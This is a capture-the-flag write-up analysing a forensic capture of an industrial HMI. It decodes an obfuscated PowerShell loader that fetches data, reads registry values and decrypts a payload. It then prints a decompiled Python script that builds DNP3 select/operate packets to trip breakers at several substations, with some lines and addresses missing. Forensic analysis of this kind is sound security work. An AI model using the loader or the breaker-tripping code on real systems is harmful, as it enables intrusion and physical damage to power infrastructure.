Tripping Breakers

Malware analysis, 481 points


Attached is a forensics capture of an HMI (human machine interface) containing scheduled tasks, registry hives, and user profile of an operator account. There is a scheduled task that executed in April 2021 that tripped various breakers by sending DNP3 messages. We would like your help clarifying some information. What was the IP address of the substation_c, and how many total breakers were tripped by this scheduled task? Flag format: flag{IP-Address:# of breakers}. For example if substation_c's IP address was and there were 45 total breakers tripped, the flag would be flag{}.

Author: Cybersecurity & Infrastructure Security Agency


CSAW CTF Quals European scoreboard

We qualified ourselves by ending up 9th europewide and really enjoyed this huge CTF with tons of various challenges. Furthermore, national teams, that will participate in the European Cybersecurity Challenge (ECSC) in late September 2021, competed with us, such as m0unt41n from Switzerland, shout out to them! We will hopefully go head to head with the competition for the Finals scheduled for 12-14 November 2021!


  1. Suspicious files understanding
  2. Python script recovery
  3. Analysis of a SCADA implementation

This challenge deals with an Industrial Control System which is based on the DNP3 protocol which is mainly used by electrical utilities and water services. We are given folders containing a Windows home directory of the human machine interface operator, known as operator and its registry keys and associated values in a JSON file:

$ tree -d
├── operator
│   ├── AppData
│   │   └── Local
│   │       ├── ConnectedDevicesPlatform
│   │       │   └── L.operator
│   │       ├── PeerDistRepub
│   │       ├── PlaceholderTileLogoFolder
│   │       ├── Publishers
│   │       │   └── 8wekyb3d8bbwe
│   │       │       ├── Fonts
│   │       │       ├── Licenses
│   │       │       ├── mcg
│   │       │       ├── Microsoft.WindowsAlarms
│   │       │       └── SettingsContainer
│   │       ├── Temp
│   │       │   ├── EOTW
│   │       │   ├── Low
│   │       │   └── mozilla-temp-files
│   │       └── VirtualStore
└── Registry

As far as we know, the AppData folder often contains files that can be relevant, thus, we focused on it and found two digital forensics artefacts that seemed weird:

  • A PowerShell script named wcr_flail.ps1.
  • A 151.txt file, which is actually an openssl encrypted file.

Suspicious files understanding

Once we discovered a PowerShell script, I thought about hidden information in registry hives as I read an article about it this technique recently regarding malware analysis. Here is the script's content:

$SCOP = ((new-object System.Net.WebClient).DownloadString("")).Replace("!","f").Replace("@","q").Replace("#","z").Replace("<","B").Replace("%","K").Replace("^","O").Replace("&","T").Replace("*","Y").Replace("[","4").Replace("]","9").Replace("{","=");
$SLPH = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($SCOP));

$E=(Get-ItemProperty -Path $SLPH -Name Blast)."Blast";

$TWR =  "!M[[pcU09%d^kV&l#9*0XFd]cVG93<".Replace("!","SEt").Replace("@","q").Replace("#","jcm").Replace("<","ZXI=").Replace("%","GVF").Replace("^","BU").Replace("&","cTW").Replace("*","zb2Z").Replace("[","T").Replace("]","iZW1").Replace("{","Fdi");
$BRN = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($TWR));

$D= (Get-ItemProperty -Path $BRN -Name Off)."Off";

openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass:$E -out "c:\1\fate.exe";
$SCOP = ((new-object System.Net.WebClient).DownloadString("")).Replace("!","f").Replace("@","q").Replace("#","z").Replace("<","B").Replace("%","K").Replace("^","O").Replace("&","T").Replace("*","Y").Replace("[","4").Replace("]","9").Replace("{","=");
PS > $SLPH = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($SCOP));
PS > echo $SLPH

We broke down the PowerShell script to display the base64 decoded values and by verifying that no IEX or alike is there, I try to avoid getting malware on my computer to be honest. For instance, for the first variable $SLPH we echo-ed it this way:

$SCOP = ((new-object System.Net.WebClient).DownloadString("")).Replace("!","f").Replace("@","q").Replace("#","z").Replace("<","B").Replace("%","K").Replace("^","O").Replace("&","T").Replace("*","Y").Replace("[","4").Replace("]","9").Replace("{","=");
PS > $SLPH = [Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($SCOP));
PS > echo $SLPH

My guess was right, this is a registry hive : HKLM:\SOFTWARE\Microsoft\Windows\TabletPC\Bell. We applied the same process for the second one and we got HKLM:\SOFTWARE\Microsoft\Wbem\Tower.

From that, we understood that the values from these registries hives are used to encrypt 151.txt with openssl, which seems to be our malware. The registry hives associated values are for one the encryption password and for the other the path to the binary. We retrieved them:

  • M4RK_MY_W0Rd5 for the password.
  • \\EOTW\\151.txt for the relative path to the binary to decrypt.
PS > $E="M4RK_MY_W0Rd5"
PS > $D="151.txt"
PS > openssl aes-256-cbc -a -A -d -salt -md sha256 -in $env:temp$D -pass pass:$E -out "fate.exe";

$ file fate.exe 
fate.exe: PE32+ executable (console) x86-64, for MS Windows

Sounds about right, after decryption, we get fate.exe which is a PE32+, which is a PE 64 bits binary from Windows. A little strings before getting deeper:

$ strings fate.exe


This is very likely to be an executable compiled with Python 3.6, can we extract the bytecode from it?

Python script recovery

This great extractor helped us to unpack the binary and get its pieces:

$ python3 fate.exe 

[+] Processing fate.exe
[+] Pyinstaller version: 2.1+
[+] Python version: 36
[+] Length of package: 5716392 bytes
[+] Found 59 files in CArchive
[+] Beginning extraction...please standby
[+] Possible entry point: pyiboot01_bootstrap.pyc
[+] Possible entry point: trip_breakers.pyc
[!] Warning: This script is running in a different Python version than the one used to build the executable.
[!] Please run this script in Python36 to prevent extraction errors during unmarshalling
[!] Skipping pyz extraction
[+] Successfully extracted pyinstaller archive: fate.exe

You can now use a python decompiler on the pyc files within the extracted directory

Interesting stuff here, let's look at trip_breakers.pyc:

$ file trip_breakers.pyc
trip_breakers.pyc: python 3.9 byte-compiled

Oh. This is awkward. We just saw a Python 3.6 DLL file used in the executable, how can this script be compiled with Python 3.9? We tried to decompile it anyway but it failed.

After a while we understood that 3.9 is the version that I used to launch pyinstxtractor, we also noticed its warning afterwards. At this point, either I install Python 3.6 and redo this process or I get to know a bit more about these compiled Python scripts. We obviously went down the second road. We asked ourselves: how can one binary (e.g. file) know that it is a 3.9 byte-compiled file: is there any magic number or signature? We stumbled upon this awesome script from Google's GitHub, which lists Python version and their associated magic number in the pyc head, which are in the two first bytes of the compiled script. Indeed, in hex digits, we had 0D 61 which is 3425 in decimal, which matches the latest 3.9 Python version. We replaced it with 20 OD or 3360 in decimal or the first 3.6 Python version magic number.

A new decompiler try was a success, end of the pyc steganography. Please have a look at the retrieved script before entering the ending chapter:

import struct, socket, time, sys
from crccheck.crc import Crc16Dnp
OPT_1 = 3
OPT_2 = 4
OPT_3 = 66
OPT_4 = 129

class Substation:

    def __init__(self, ip_address, devices): = ip_address
        self.devices = []
        self.src = 50
        self.transport_seq = 0
        self.app_seq = 10
        for device in devices:


    def connect(self):
        print('Connecting to {}...'.format(
        self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.socket.connect((, 20000))
        print('Connected to {}'.format(

    def add_device(self, device):
        self.devices.append({'dst':device[0],  'count':device[1]})

    def activate_all_breakers(self, code):
        for device in self.devices:
            dnp3_header = self.get_dnp3_header(device['dst'])
            for x in range(1, device['count'] * 2, 2):
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_1, code)
                dnp3_packet = dnp3_header + self.get_dnp3_data(x, OPT_2, code)

    def get_dnp3_header(self, dst):
        data = struct.pack('<H2B2H', 25605, 24, 196, dst, self.src)
        data += struct.pack('<H', Crc16Dnp.calc(data))
        return data

    def get_dnp3_data(self, index, function, code):
        data = struct.pack('<10BIH', 192 + self.transport_seq, 192 + self.app_seq, function, 12, 1, 23, 1, index, code, 1, 500, 0)
        data += struct.pack('<H', Crc16Dnp.calc(data))
        data += struct.pack('<HBH', 0, 0, 65535)
        self.transport_seq += 1
        self.app_seq += 1
        if self.transport_seq >= 62:
            self.transport_seq = 0
        if self.app_seq >= 62:
            self.app_seq = 0
        return data

def main():
    if socket.gethostname() != 'hmi':
    substation_a = Substation('', [(2, 4), (19, 8)])
    substation_b = Substation('', [(9, 5), (8, 7), (20, 12), (15, 19)])
    substation_c = Substation('', [(14, 14), (9, 16), (15, 4), (12, 5)])
    substation_d = Substation('', [(20, 17), (16, 8), (8, 14)])
    substation_e = Substation('', [(12, 4), (13, 5), (4, 2), (11, 9)])
    substation_f = Substation('', [(1, 4), (3, 9)])
    substation_g = Substation('', [(10, 14), (20, 7), (27, 4)])
    substation_h = Substation('', [(4, 1), (10, 9), (13, 6), (5, 21)])
    substation_i = Substation('', [(14, 13), (19, 2), (8, 6), (17, 8)])

if __name__ == '__main__':

Analysis of a SCADA implementation

From here, we reminded us what we were looking for:

  • The IP address associated to the substation_c.
  • The number of breakers that were tripped by this malicious scheduled task.

First goal is easily completed:

substation_c = Substation('', [(14, 14), (9, 16), (15, 4), (12, 5)]) is the requested IP address, then we needed to understand these OPT_i variables, which seemed to be the different kind of operations done by the script.

We looked up for documentation and found this script which explains that 3 and 4 are respectively the SELECT and OPERATE operations on devices. One can not OPERATE without at first SELECT-ed a device, this is why in the code, the OPT_1 packet is sent before the OPT_2 one. Moreover, we did not find anything about the OPT_3 value which is 66 but that is not the case for the OPT_4 known as 129 or an operation to send a response after a request. Hence, this script sends most likely responses without being asked? This is probably what made the devices crash. After summing up the substations that sent an OPT_4 operation, we counted 200 breakers that were tripped. Hence, our guessed flag was flag{} which turned out to be the one! FLAG!

results matching ""

    No results matching ""